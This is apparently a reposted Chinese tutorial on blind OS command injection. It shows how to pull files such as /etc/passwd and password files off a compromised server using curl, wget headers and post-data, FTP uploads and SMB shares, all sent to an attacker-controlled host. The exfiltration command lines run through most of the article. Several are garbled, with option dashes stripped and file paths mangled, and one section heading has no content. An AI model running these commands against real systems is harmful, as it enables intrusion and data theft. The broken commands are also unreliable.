免责声明:本文旨在技术分享,仅供安全学习,禁止非法利用。 在渗透测试或者CTF挑战中,你可能会遇到一个需要用户输入文本信息的应用程序,该应用会将用户的输入作为参数传递给一个系统命令或者给底层运行着任务的关联程序。而我们知道,如果没有对输入的信息进行校验或者过滤,那么该应用就可能被利用来进行“操作系统命令注入”。 对于攻击者来说,他可以通过注入漏洞,利用应用程序的权限来执行命令。在这种背景下,目前我们在实际的应用案例中,也观察到这种类型的攻击漏洞,存在于大量的应用程序。而针对的应用程序往往是以下的应用类型,例如: 可以发送邮件到用户指定地址的应用程序。
可以监控企业服务器运行情况的应用程序
使用基于用户输入的第三方工具来完成传输报告的应用程序
在渗透测试或者CTF中,在确认了漏洞之后,你可能开始对目标主机上感兴趣的区域进行探测分析了,希望能找到奖杯或者其他有用的信息,如, 操作系统密码文件
操作系统配置文件
数据库文件
应用程序源代码
举一个基本的例子,通过注入Windows命令“type”,作为一个参数进行传递,去读取服务器上的一个文件,最后返回相关文本信息。 很多时候,需要对正在执行的命令作中断。可以想象一下,一个系统监测应用软件,在监测主机存活状态时,会去ping一个ip地址,检测主机是否在线。那么在系统的底层也会执行用户输入的IP地址,如 ping c 5 **.**.**.** 如果在应用程序已经运行ping命令之后,你还想运行其他命令的话,可以参考以下的注入命令方式: 在上个例子中,我们通过“type”命令,在HTTP响应之后,返回服务器上的相应的文本信息。那么在实际环境中,往往在注入命令之后,没有任何的输出返回,那么展开注入的方式被称为“操作系统命令盲注”。 在这种情况下我们如何找到有用的信息?下面将详细介绍一些方法,可以无需上传 web shell 到主机上。 NetCat cURL cURL是一个使用多种协议传输数据的命令行工具和库,是一个非常有用的数据库下载工具。如果目标服务器有 cURL,那么我们仍然可以利用它来post文件到指定的服务器上或者通过其他协议来传输文件,如FTP/SCP/TFTP/TELNET等协议。 在你已经确认了一个系统操作命令注入漏洞之后,要通过 HTTP协议来传输文件,可以使用以下命令来post文件到web服务器上。 cat /path/to/file | curl F “:data=@-“ http://**.**.**.**x:**x/test.txt 执行以上命令后,你可以在服务器日志上看到相关的文件内容。如果在渗透测试中,执行了以上操作, 同时需要web 服务器也确保配置使用ssl,保护客户端数据不被传播到网络上。以下展示了将/etc/passwd内容作为一个请求返回。 CURL 命令也能够被用来通过FTP来传输文件。同样的,如果你能确认一个操作系统命令注入漏洞时,可以用以下命令来传输文件到 FTP服务器上。 curl T {path to file} ftp://**.**.**.** user {username}:{password} 以下是使用FTP将文件从目标服务器传输到FTP服务器上。 当然,cURL也可以使用其他的协议进行传输,如之前提到的SCP, TFTP 或TELNET,这里就不再一一介绍了。 WGET wget是一个从网络上自动下载文件的自由工具。它支持HTTP,HTTPS和FTP协议,并可以使用HTTP代理. 所谓的自动下载是指,wget可以在用户退出系统之后仍然在后台执行。这意味这你可以登录系统,启动一个wget下载任务,接着退出系统,而wget将在后台执行直到任务完成。 同时也可以使用WGET提交一个包含header报文头部的请求到服务器,格式如下, header=’name:value’ 可以通过以上的这种方式,抓取想要的数据。可以将需要抓取的文件名称路径设置为header的值。 wget header=”EVIL:$(cat /datacret/password.txt)”http://**.**.**:** 我们可以从web 服务器上的日志看到相应的效果,如下, 我们也可以使用标签记号来将一个命令封装到在执行原始命令的数据里面去。下一个例子展示了如何取回/etc/passwd文件。 wget header=”evil:`cat /etc/passwd | xargs echo n`” http://**.**.**:**x 实际上,也可以使用 WGET提交一个post请求到我们的web服务器上,接着通过使用 ‘post-data’ 在发送请求的主体中加入字符串数据。或者使用 ‘post-file’来将文件传输到web服务器。操作命令及效果如下 wget post-data exfil=`cat /datacretcretcode.txt` http://**.**.**.**:**x wget post-file trophy.php http://**.**.**.**:**x SMB 通过SMB协议,在目标服务器和主机之间建立网络共享连接,然后将目标服务器上的文件做分享,接着就可以在主机端将分享的文件copy下来啦。操作的命令如下, net use h: \\**.**.**.**\web /user:{username} {password} |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|
注册
登录
